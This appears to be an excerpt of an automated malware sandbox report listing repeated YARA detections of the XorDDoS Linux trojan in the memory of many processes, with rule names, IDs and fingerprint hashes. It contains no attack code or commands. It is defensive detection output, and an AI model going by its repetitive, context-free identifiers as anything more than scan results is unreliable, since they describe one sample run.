            Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
